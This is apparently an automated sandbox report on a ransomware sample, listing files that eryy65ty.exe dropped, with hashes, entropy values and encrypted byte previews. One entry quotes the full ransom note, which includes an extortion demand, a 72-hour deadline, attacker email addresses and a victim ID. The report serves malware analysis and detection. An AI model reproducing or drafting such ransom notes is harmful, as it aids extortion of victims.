                                                                                                                                            Preview: ....A...._...-..q...&3.J.[....?.N....U..O."......o.JcY...s.{<.{l...M..@.\.,XHCw..._........%C.'s>......t"..#..Uh........q..m=..O...kI.H....Id....I...4T..H.Z.<......J..(.T^...7..2Bk..q.,..8.t.^..E....[85D.0.=.x.3.......[".......B:.!Q...g..{f.g..,.._<.^.Z.R%^...n..W.f7."....-.D3.*6.=.7]a.*...D..|..{....4".l..2..+..md..........+.....e..2.URM2.V..E..2.$y.*....w..'..22t......7.U.K<..)..@a.....,...V.=k.a.8cx]...K._ukRx/....D)f,.4q...x.>.~..l...,;.z..'....-...gR....U..=B..q...(V.Ow-.{X.>SAn..y.$.V"..J../.......~......W..2h..A.t".....>rRye..eC.....Y.=..EN...a.L.+...P.>...."[..6..q.ow'...-Uu..0.P.)T....f...$...q*!..U...J.D~......q..V.[. i...l......6.L.M.r5 .(..-!...2..f+....J.G.A.... \...,....mF.V....=&V.....q.C........2.bg&3.q*).2...w9.|...'..U...Um0%>`.f.........&.^dId...|.r.... ~....2a...M....J..|e....n*..R....}......m..T.km.81..s...J......C;;.....D.....jwt...9.9i.mR.....G....H...*.SC".>.s...*We..D....>~...z......C$p...e.^...N4.m...`....-P..p..Xl.WK
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.8559461135831015
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:S5AX5BGqPJSAkRRwH3Wt4I4T5cOmrQ72C2jxUnNabMiENWrHnowKPHGmQ642:S5ZqPJowXK4/uBHC2mwgidCdHZ
                                                                                                                                            MD5:39EEFD0017C26BD120F7527793268ABC
                                                                                                                                            SHA1:588B3FEF48CC1E1D0FF906BA9F2F3B6BF399379F
                                                                                                                                            SHA-256:D384A132C6268C9FE14D37BB86DBBEBF17D093CC7F8A92D2048AEC9CACC3ED1A
                                                                                                                                            SHA-512:5BF9C235939C3217F329360D9B16582FB12846F11A67EB2082F0356C83FDB4D4398B17490E355FC2C945A1D540F1A71E25CA68865F9DCC9E9134C4338A0070AC
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:v.3...l:e.w...X.>Uu....]...P?+5.Q...Rs"..k.a.;..;.o.......C...H...+....H WQ....r8.sWY,..)A...Z.........N.D.\..:P.x..Kca..N.....F.H.<..>O....[.K.[.f.....C.3I..|..u..D..U..)5.?.e^h:".[..........K..-U.`...g.,.9..r...@..Z......&.....O....}..H....t...6....G..o.~.....T...Y.!E...L.k%...g.)....k@..}.)..(.g*=......#M... .J...a.23..Xr.g.0....I.U.]...v@.kP.......D..._"....3....M+#..my<....s.t..:Ub..]&..[A.[A~...E...mR.G..B....3.+..../3E..m...<...Q..~.Sn...a..P.d.s.4.....?ky....K.HX.4.r.N.A....o....pg...N..E.o..S6p.H(.-..&.....O9N....BnE. ...K.i....w....$S..4......(.T.).9....*...G.D................lf..e.R"....RO..K...Sq~.........b. .,y}[c+.R..-.....Y..lI...9Ii.pc....W.{xp#.....L...V.9... ...2..e%.......*j........A..y...d.;:.,h.^.`.......d....Fb.m+J`..vo.d.....i..O..'#.l..0. <qi.8...l..'.F~8ve.WkxV.....<..L\....;.U<.2?..y?....?=<...Ly .N.B..M...$..KM.....b.<>....,R.v.s.r>.....,).d...JT....M.R@IL....\..>.M..'7.M..v.....{x..:.)..R..(....T.W.......v.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.8559461135831015
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:S5AX5BGqPJSAkRRwH3Wt4I4T5cOmrQ72C2jxUnNabMiENWrHnowKPHGmQ642:S5ZqPJowXK4/uBHC2mwgidCdHZ
                                                                                                                                            MD5:39EEFD0017C26BD120F7527793268ABC
                                                                                                                                            SHA1:588B3FEF48CC1E1D0FF906BA9F2F3B6BF399379F
                                                                                                                                            SHA-256:D384A132C6268C9FE14D37BB86DBBEBF17D093CC7F8A92D2048AEC9CACC3ED1A
                                                                                                                                            SHA-512:5BF9C235939C3217F329360D9B16582FB12846F11A67EB2082F0356C83FDB4D4398B17490E355FC2C945A1D540F1A71E25CA68865F9DCC9E9134C4338A0070AC
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:v.3...l:e.w...X.>Uu....]...P?+5.Q...Rs"..k.a.;..;.o.......C...H...+....H WQ....r8.sWY,..)A...Z.........N.D.\..:P.x..Kca..N.....F.H.<..>O....[.K.[.f.....C.3I..|..u..D..U..)5.?.e^h:".[..........K..-U.`...g.,.9..r...@..Z......&.....O....}..H....t...6....G..o.~.....T...Y.!E...L.k%...g.)....k@..}.)..(.g*=......#M... .J...a.23..Xr.g.0....I.U.]...v@.kP.......D..._"....3....M+#..my<....s.t..:Ub..]&..[A.[A~...E...mR.G..B....3.+..../3E..m...<...Q..~.Sn...a..P.d.s.4.....?ky....K.HX.4.r.N.A....o....pg...N..E.o..S6p.H(.-..&.....O9N....BnE. ...K.i....w....$S..4......(.T.).9....*...G.D................lf..e.R"....RO..K...Sq~.........b. .,y}[c+.R..-.....Y..lI...9Ii.pc....W.{xp#.....L...V.9... ...2..e%.......*j........A..y...d.;:.,h.^.`.......d....Fb.m+J`..vo.d.....i..O..'#.l..0. <qi.8...l..'.F~8ve.WkxV.....<..L\....;.U<.2?..y?....?=<...Ly .N.B..M...$..KM.....b.<>....,R.v.s.r>.....,).d...JT....M.R@IL....\..>.M..'7.M..v.....{x..:.)..R..(....T.W.......v.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.844408663484252
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UyuU9oltas50S8XO4LUCcPrnUWc5nxjrWiidZ6ViWtJy4mW9kY//Bkxjrv/Wjy:U0gYsdZCM5cHbdzJy4r9LHaxjrWe
                                                                                                                                            MD5:D12AACBC43D1A1C2BACE1FEDBDF2CD4E
                                                                                                                                            SHA1:3F834D498263E6B3F7B2452B6E101417A00B513A
                                                                                                                                            SHA-256:2B62C376FBABDE435E821D33069C36B39ECE68853AF885199E9E39D32740ADEF
                                                                                                                                            SHA-512:E687FD889642BA085956D0E98979F1C704070D0CF69D38CCF2AA77B18223798B54AE0CC23F75FEB0409FA8ACC4A0FFE6427C182E9961D9F00916FF512F118A10
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...8Ms.'Z...r..cS.........I:..t*..!Z$..,-).5..S.tJ.,s)...B F=.}......}....`=0.'..o....n..yX]05#:.....i!..`..w..F...A....`...C.e...Zt..}.....r..B.....g%.....m....^..C..Bc..Or..}.H<(..U7.v.17.G2..=.T....Cr.l`........^&...o.M5v.#.+......N.O..Y.+9........Z....7..........e........f.&r...>.%#@=..5....@.......j..F].....o4`5.f....1w.h...A/>....L_..Oz.q.]b.....^......XTr.C.....%...R.....)...m.6...Z{...}._.$_R;...Z..../.9.HDG.j+.+;.<F{H.yv+...^..:...].......^m...j..q.2.s......4H.h.Ia.w..C..!w.3.kAuS.6.'zm..|W...>).....K.c..J.G..#.<..X..+I,...+`|.^.........\u.u.4..,.v8..k...*.....fa\.9fE.d........;gU.6.}............L."....V..c.P....r.Q.z..0......8O..sK..(.s..s.+.W>.......NbR..g..v.}.l.N..v.q...e.5..#..{....K...8.-..w!..-.D"3.._OzL.EU.nF...n=...~.....O.@..z....#........ .M..9...,E.O.......]k.SDc=..ibI".....q._.X.h.....o..m....%^+,-c.J..N..2.sy....@C....`.Q@..S...|.....5.6B.d5h......d.....N..tce9..RG.4..4.?.W1....)_..bu|..ex5....3.*...vj..rb.n..w...a.9.W"4
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.844408663484252
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UyuU9oltas50S8XO4LUCcPrnUWc5nxjrWiidZ6ViWtJy4mW9kY//Bkxjrv/Wjy:U0gYsdZCM5cHbdzJy4r9LHaxjrWe
                                                                                                                                            MD5:D12AACBC43D1A1C2BACE1FEDBDF2CD4E
                                                                                                                                            SHA1:3F834D498263E6B3F7B2452B6E101417A00B513A
                                                                                                                                            SHA-256:2B62C376FBABDE435E821D33069C36B39ECE68853AF885199E9E39D32740ADEF
                                                                                                                                            SHA-512:E687FD889642BA085956D0E98979F1C704070D0CF69D38CCF2AA77B18223798B54AE0CC23F75FEB0409FA8ACC4A0FFE6427C182E9961D9F00916FF512F118A10
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...8Ms.'Z...r..cS.........I:..t*..!Z$..,-).5..S.tJ.,s)...B F=.}......}....`=0.'..o....n..yX]05#:.....i!..`..w..F...A....`...C.e...Zt..}.....r..B.....g%.....m....^..C..Bc..Or..}.H<(..U7.v.17.G2..=.T....Cr.l`........^&...o.M5v.#.+......N.O..Y.+9........Z....7..........e........f.&r...>.%#@=..5....@.......j..F].....o4`5.f....1w.h...A/>....L_..Oz.q.]b.....^......XTr.C.....%...R.....)...m.6...Z{...}._.$_R;...Z..../.9.HDG.j+.+;.<F{H.yv+...^..:...].......^m...j..q.2.s......4H.h.Ia.w..C..!w.3.kAuS.6.'zm..|W...>).....K.c..J.G..#.<..X..+I,...+`|.^.........\u.u.4..,.v8..k...*.....fa\.9fE.d........;gU.6.}............L."....V..c.P....r.Q.z..0......8O..sK..(.s..s.+.W>.......NbR..g..v.}.l.N..v.q...e.5..#..{....K...8.-..w!..-.D"3.._OzL.EU.nF...n=...~.....O.@..z....#........ .M..9...,E.O.......]k.SDc=..ibI".....q._.X.h.....o..m....%^+,-c.J..N..2.sy....@C....`.Q@..S...|.....5.6B.d5h......d.....N..tce9..RG.4..4.?.W1....)_..bu|..ex5....3.*...vj..rb.n..w...a.9.W"4
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.832432817093161
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:6Yda4IEuIkHL6k6tntKirpcoQza8DqBitQgKC7au+qk8h:bjE765tRrmPjsithKKVBh
                                                                                                                                            MD5:6533FFDC75D7D53121F8A8D9DAF82087
                                                                                                                                            SHA1:B8737C67F88181B3EE91E7E85F934DCECD09BD8F
                                                                                                                                            SHA-256:B005F586999C60E86B704640D926FA06A26811758108BDB9FCAD99EF8454E38B
                                                                                                                                            SHA-512:0D020C4730D554C7478F085F77ABEE31B736C97089B0B0CB5E1ACBCA7FAB13E98E871F173D5F40348E6E4A37F96907633EE1059ED43CF2477D0F103BB241B3E3
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:5.I..hI......{M.....x..!R...m..=a.-*......T)N.d...A*._ .H.66....Y....FU...Z..b.v..Z.......!.X.+.s.....Z ..dnKR......k.l.k..x.v...|R.....c..gnA1..a.A.+......T.J.`.,...,..1.8.B"..i..W.1o9..Z.....B...n..i."..o..R;:|.X......Ti.&+U....dTF......o..B.E;.B.2.e.1.}...*5.9..4..n..#A.4K!..j..QE.n..Z.T...v..b+..S:..v.~.kP"..@.IQ....5W..].{..cw}.^.....m.m.._....?.U$K..D..1..,~...a..HH.....|.{.....Z.nK..D.%.H..V..J..6H.k.uh..Fu.U/.q1s..).B.i.'dpj...9..S.............$.....K,..:R...8:....n......5.48....]..7....O|.P.... 'B..'. .....2F..\ZL.Ny..}.IH...|b...F...J..R~...&......Y[.$&&..._...!.w....../..+..I.n....s.~1.T...a3.hoR..........v.......c..C.c.UC..0..p..0VU..@...........j..|c.](*sSlT..Z......:....e.+...L4...S...1L......[..B'.6F..Ag.B.zF_.r.e,....I....B............4.c..r.u..........:.q.O...<........{1t....@ss.].S.....E.c.i........b.Fl.....|o.E...@LW#.y.n...O.9...S.^.....t*3l..5...q..G~...Qy.......g.[=g.NGV8V..#J-..|.......?t...(nC....@.3T..;-.M.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.832432817093161
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:6Yda4IEuIkHL6k6tntKirpcoQza8DqBitQgKC7au+qk8h:bjE765tRrmPjsithKKVBh
                                                                                                                                            MD5:6533FFDC75D7D53121F8A8D9DAF82087
                                                                                                                                            SHA1:B8737C67F88181B3EE91E7E85F934DCECD09BD8F
                                                                                                                                            SHA-256:B005F586999C60E86B704640D926FA06A26811758108BDB9FCAD99EF8454E38B
                                                                                                                                            SHA-512:0D020C4730D554C7478F085F77ABEE31B736C97089B0B0CB5E1ACBCA7FAB13E98E871F173D5F40348E6E4A37F96907633EE1059ED43CF2477D0F103BB241B3E3
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:5.I..hI......{M.....x..!R...m..=a.-*......T)N.d...A*._ .H.66....Y....FU...Z..b.v..Z.......!.X.+.s.....Z ..dnKR......k.l.k..x.v...|R.....c..gnA1..a.A.+......T.J.`.,...,..1.8.B"..i..W.1o9..Z.....B...n..i."..o..R;:|.X......Ti.&+U....dTF......o..B.E;.B.2.e.1.}...*5.9..4..n..#A.4K!..j..QE.n..Z.T...v..b+..S:..v.~.kP"..@.IQ....5W..].{..cw}.^.....m.m.._....?.U$K..D..1..,~...a..HH.....|.{.....Z.nK..D.%.H..V..J..6H.k.uh..Fu.U/.q1s..).B.i.'dpj...9..S.............$.....K,..:R...8:....n......5.48....]..7....O|.P.... 'B..'. .....2F..\ZL.Ny..}.IH...|b...F...J..R~...&......Y[.$&&..._...!.w....../..+..I.n....s.~1.T...a3.hoR..........v.......c..C.c.UC..0..p..0VU..@...........j..|c.](*sSlT..Z......:....e.+...L4...S...1L......[..B'.6F..Ag.B.zF_.r.e,....I....B............4.c..r.u..........:.q.O...<........{1t....@ss.].S.....E.c.i........b.Fl.....|o.E...@LW#.y.n...O.9...S.^.....t*3l..5...q..G~...Qy.......g.[=g.NGV8V..#J-..|.......?t...(nC....@.3T..;-.M.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.833938769462886
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:QHsEmE37RIjC/t0GMcnVvBWQC4iPFnYzs9BVPBdR0NfulhWtw/fdSFixJ:Q37RIjC5Mc9BdC1p9B4NG3XMixJ
                                                                                                                                            MD5:75156A3F515F07E84B77B74B025E7141
                                                                                                                                            SHA1:A28123C7D0D806B80D7F597FCC6CCD4C750CCCAE
                                                                                                                                            SHA-256:5F349BF9866EC3787B2DA2DAB08DCE16B9221A7812EBFB9810F6783D4D4210AC
                                                                                                                                            SHA-512:17FD9B600293590D734EDEBA69978C9F89F706350C2E75F19FC08D099E092F8DF4C6044D0674B8573A1E538966A718E07319BA0056EDB600B82EC9E04D0D4141
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:H/.."r .<.T.I....x..i.y..v..^zju..4D...,..=...Th.iXw.uK..qH.h...;U....D.E.......wO..e...aI.\..x.....f.T.....h........V.g.}V....H.iq%..?.A.....!_.l..J.l...68....>...`.*o.#....eV.....0d..z..)..uRQ.M...*..PqE.4_@c.E.\....b....e.J.U.y.$..$.....C......#.-..8..V(.Gy*.......A.eAM _...g-...z......6.f.+.ZGZ..".......K..E{xT.Td.zHa.g.*.\K)..B3i...cj4.I....g......hJ..k....:.N.Ds$.....m....s."..Dq...$..TC+...>....N.#.'..>.`2.1.".2.6.4\.F>.S`7d......-.......r.h....j..x.m..{(...|.....'.r..q.~..6..(.* s.m.y.u.n..SR.......kd..........]....B>.>.B..?./...w.L...N.. a..r..-...RQn6..k.>6..5/}.......g..4...*o....5..]...`...'.Q.._."/Ku=.G..e..P....~".t~...{.oD.s...`-.....A..7.ab...R..T.xT...S}>..G49..*..k.j.{......G..1.....t.s....i....U....h...Q.'UF......~...Z...<M.5>a.e8.z+~\....l..KS..DtG.n}.~|.p..ws.j...I..}j<..ZZ..;....W.7.^.Mp....n.s..:..4..W...8.%.y..0e..8.<....Our."Q.a......}..&u.B...............r&.v.......Y`}....e....m. {...l..#s...)
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.833938769462886
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:QHsEmE37RIjC/t0GMcnVvBWQC4iPFnYzs9BVPBdR0NfulhWtw/fdSFixJ:Q37RIjC5Mc9BdC1p9B4NG3XMixJ
                                                                                                                                            MD5:75156A3F515F07E84B77B74B025E7141
                                                                                                                                            SHA1:A28123C7D0D806B80D7F597FCC6CCD4C750CCCAE
                                                                                                                                            SHA-256:5F349BF9866EC3787B2DA2DAB08DCE16B9221A7812EBFB9810F6783D4D4210AC
                                                                                                                                            SHA-512:17FD9B600293590D734EDEBA69978C9F89F706350C2E75F19FC08D099E092F8DF4C6044D0674B8573A1E538966A718E07319BA0056EDB600B82EC9E04D0D4141
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:H/.."r .<.T.I....x..i.y..v..^zju..4D...,..=...Th.iXw.uK..qH.h...;U....D.E.......wO..e...aI.\..x.....f.T.....h........V.g.}V....H.iq%..?.A.....!_.l..J.l...68....>...`.*o.#....eV.....0d..z..)..uRQ.M...*..PqE.4_@c.E.\....b....e.J.U.y.$..$.....C......#.-..8..V(.Gy*.......A.eAM _...g-...z......6.f.+.ZGZ..".......K..E{xT.Td.zHa.g.*.\K)..B3i...cj4.I....g......hJ..k....:.N.Ds$.....m....s."..Dq...$..TC+...>....N.#.'..>.`2.1.".2.6.4\.F>.S`7d......-.......r.h....j..x.m..{(...|.....'.r..q.~..6..(.* s.m.y.u.n..SR.......kd..........]....B>.>.B..?./...w.L...N.. a..r..-...RQn6..k.>6..5/}.......g..4...*o....5..]...`...'.Q.._."/Ku=.G..e..P....~".t~...{.oD.s...`-.....A..7.ab...R..T.xT...S}>..G49..*..k.j.{......G..1.....t.s....i....U....h...Q.'UF......~...Z...<M.5>a.e8.z+~\....l..KS..DtG.n}.~|.p..ws.j...I..}j<..ZZ..;....W.7.^.Mp....n.s..:..4..W...8.%.y..0e..8.<....Our."Q.a......}..&u.B...............r&.v.......Y`}....e....m. {...l..#s...)
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.8370095338566435
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:kDtZVCfmR/tKuaiIZeY1vvHCxWGHLMXfamOJ98TZ8UXkuuWblRourrBv:kPVoGVKuavZeUvHCQs4XTOkdhkuAKBv
                                                                                                                                            MD5:F2054B3AEF83C187D1CD572D5AD77B90
                                                                                                                                            SHA1:87032217F7EEF709289831C5063F88266707B6EF
                                                                                                                                            SHA-256:6DD8C19A8BAE4778C7E24CA4BD91E19993E831EC2147AF989B9A44D797F81E77
                                                                                                                                            SHA-512:0B838CFED4E51358B5A988C80AE42C4717EBD2E1E3727E0DEA934D0AA0F3E40A752B5B8102266DC631EDA21AFD628D9718B5DFBC7CAAE351492B05A817B02ED8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:rH..u.*..:>.b..x.7.#...i....m.....'`.xzo.<g......f.`?...yd..(4x.m........:o...e..w.l....I.^>.'.z..n..S.L..w`"f.}.li.b.]p+]+.'.'3.bt...QS.E..\7kK.'.2..u2..:.EZ.._J.hQ..|B.T...5...f7,@U....[..U.".R.Mo"$.....;.....1.w.>V...K..,...K...O.Q.5.@....-.>,.b.s...B.B{..2.........u.....pB}.....v..|....|.A......].;..$M8:|.....8.Y.....=.{...,"Y..b..]...m....1.SO..v.gAl..Y.Cf8...p.P..o....?7.X........................z.I.3(.\).B...>.H..#iX..T.>..~.....5.[oY.k.@.4..qh.i[....4.c...3.r.....3.(E.M3.q.Nz.4"g.I.L..q.....h.J....+..O......(....P..C.YM..F.........j.......O....U.|X9.6].n..........mC..e..Ff.z..e....c...n.~............<..<.b...5.GRI..A...]o.Z<..h....L...s)..4....^.:....+.7Y6..%....{Y.....%`.......,5.R..gW$5.u.......\..q27"_]..B......%..(G8.....].d.vn}rI*........|..XMY.OS.......u.e>%.!......r....r.....Zry.\......O..BNPHU...yy......t].f......c~z0.EB...."..k.tS._..$23......N...}......:S........O.N9.....!....VJ.U.o.d.f.......c..?.K...o....H0q.^.H.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.8370095338566435
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:kDtZVCfmR/tKuaiIZeY1vvHCxWGHLMXfamOJ98TZ8UXkuuWblRourrBv:kPVoGVKuavZeUvHCQs4XTOkdhkuAKBv
                                                                                                                                            MD5:F2054B3AEF83C187D1CD572D5AD77B90
                                                                                                                                            SHA1:87032217F7EEF709289831C5063F88266707B6EF
                                                                                                                                            SHA-256:6DD8C19A8BAE4778C7E24CA4BD91E19993E831EC2147AF989B9A44D797F81E77
                                                                                                                                            SHA-512:0B838CFED4E51358B5A988C80AE42C4717EBD2E1E3727E0DEA934D0AA0F3E40A752B5B8102266DC631EDA21AFD628D9718B5DFBC7CAAE351492B05A817B02ED8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:rH..u.*..:>.b..x.7.#...i....m.....'`.xzo.<g......f.`?...yd..(4x.m........:o...e..w.l....I.^>.'.z..n..S.L..w`"f.}.li.b.]p+]+.'.'3.bt...QS.E..\7kK.'.2..u2..:.EZ.._J.hQ..|B.T...5...f7,@U....[..U.".R.Mo"$.....;.....1.w.>V...K..,...K...O.Q.5.@....-.>,.b.s...B.B{..2.........u.....pB}.....v..|....|.A......].;..$M8:|.....8.Y.....=.{...,"Y..b..]...m....1.SO..v.gAl..Y.Cf8...p.P..o....?7.X........................z.I.3(.\).B...>.H..#iX..T.>..~.....5.[oY.k.@.4..qh.i[....4.c...3.r.....3.(E.M3.q.Nz.4"g.I.L..q.....h.J....+..O......(....P..C.YM..F.........j.......O....U.|X9.6].n..........mC..e..Ff.z..e....c...n.~............<..<.b...5.GRI..A...]o.Z<..h....L...s)..4....^.:....+.7Y6..%....{Y.....%`.......,5.R..gW$5.u.......\..q27"_]..B......%..(G8.....].d.vn}rI*........|..XMY.OS.......u.e>%.!......r....r.....Zry.\......O..BNPHU...yy......t].f......c~z0.EB...."..k.tS._..$23......N...}......:S........O.N9.....!....VJ.U.o.d.f.......c..?.K...o....H0q.^.H.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.82647985343122
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:a01oE3QUANrgwCqBkqY5keqccJmjOnHHr+u+RUYak1I7eSoQWMQz1ZUvy:EE3YdckDKjOnr+u+/ak1I7RbRQZZEy
                                                                                                                                            MD5:671BE710D941170B84E78014C70E949D
                                                                                                                                            SHA1:767E7C1FCE956F99CE71428ECBC2B3DFCF06BAC4
                                                                                                                                            SHA-256:59057EBD6F2436A46AD44CDF74CE2A16D8064939864664902BAE35C9290E2D0A
                                                                                                                                            SHA-512:625C9CF8FCD75AB8DD34B5DBC8FA0F03A3E154436E2789602BBA04EBF94B34B162BED732393DF39EFDBDAD51295A226F98931504F87D3940752FA9C09CB14E76
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:G...2Jv.....SHer\........6..$L.#....G.p&.j~B$.'..O..A..j..H....R~.../..D....G...x.!.~.i...HF..!..e.....B$B..ea...k...._.y...h.F....1..I`.s...J.......X.`,...l.."O....o..r....WhU..Tr.8.F..#...Ae%!.....u.8.....o.kd...o..v.1....l..N/!..^q4}...rS...':.........>S...l.F....P..4l..wM1..W.Vc.A.*..Xw...K...J.b...%L...*.Up.L.VLM.....U.....;.?X.....6...*..fo..l=.1z..k..l.W.....p.D..H.9.K!~.......0..'.4j&09.h.$6.--.$.iu.....&s.0".......Z..@..N...!.........2.5...I.c......R..R.bK........A..H.@..K..h.H.c....M..1.T1].\.o*.............~&...5J...I...~w..W....; =..%.j..:X.".1M+.32...2.^.......)C:...x*..t.1..o.j.T^.%....G.!.".b.."Po..}..8s.p..N41........a....?...j<..N....Q;M...B...i..5&..9T...-.:.`T...>..2..<....Dg.H6d.FRh...7....~..2.V...Wz\%...g>+o.......*..@.8....)...g5U..&.#Y..~'l..L.....`.eQG..+.....B.aB\R..F..S.\yH4e...V4G..q..s.....56.F.b..9..`h..j.n.p..B>0..I.....i3.At.p....R...5.I.[e..oG.+...):Y.l....U..G.HKM...X/\......._.v....6..6.;E..<-.......JEa.X...Q8
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.82647985343122
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:a01oE3QUANrgwCqBkqY5keqccJmjOnHHr+u+RUYak1I7eSoQWMQz1ZUvy:EE3YdckDKjOnr+u+/ak1I7RbRQZZEy
                                                                                                                                            MD5:671BE710D941170B84E78014C70E949D
                                                                                                                                            SHA1:767E7C1FCE956F99CE71428ECBC2B3DFCF06BAC4
                                                                                                                                            SHA-256:59057EBD6F2436A46AD44CDF74CE2A16D8064939864664902BAE35C9290E2D0A
                                                                                                                                            SHA-512:625C9CF8FCD75AB8DD34B5DBC8FA0F03A3E154436E2789602BBA04EBF94B34B162BED732393DF39EFDBDAD51295A226F98931504F87D3940752FA9C09CB14E76
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:G...2Jv.....SHer\........6..$L.#....G.p&.j~B$.'..O..A..j..H....R~.../..D....G...x.!.~.i...HF..!..e.....B$B..ea...k...._.y...h.F....1..I`.s...J.......X.`,...l.."O....o..r....WhU..Tr.8.F..#...Ae%!.....u.8.....o.kd...o..v.1....l..N/!..^q4}...rS...':.........>S...l.F....P..4l..wM1..W.Vc.A.*..Xw...K...J.b...%L...*.Up.L.VLM.....U.....;.?X.....6...*..fo..l=.1z..k..l.W.....p.D..H.9.K!~.......0..'.4j&09.h.$6.--.$.iu.....&s.0".......Z..@..N...!.........2.5...I.c......R..R.bK........A..H.@..K..h.H.c....M..1.T1].\.o*.............~&...5J...I...~w..W....; =..%.j..:X.".1M+.32...2.^.......)C:...x*..t.1..o.j.T^.%....G.!.".b.."Po..}..8s.p..N41........a....?...j<..N....Q;M...B...i..5&..9T...-.:.`T...>..2..<....Dg.H6d.FRh...7....~..2.V...Wz\%...g>+o.......*..@.8....)...g5U..&.#Y..~'l..L.....`.eQG..+.....B.aB\R..F..S.\yH4e...V4G..q..s.....56.F.b..9..`h..j.n.p..B>0..I.....i3.At.p....R...5.I.[e..oG.+...):Y.l....U..G.HKM...X/\......._.v....6..6.;E..<-.......JEa.X...Q8
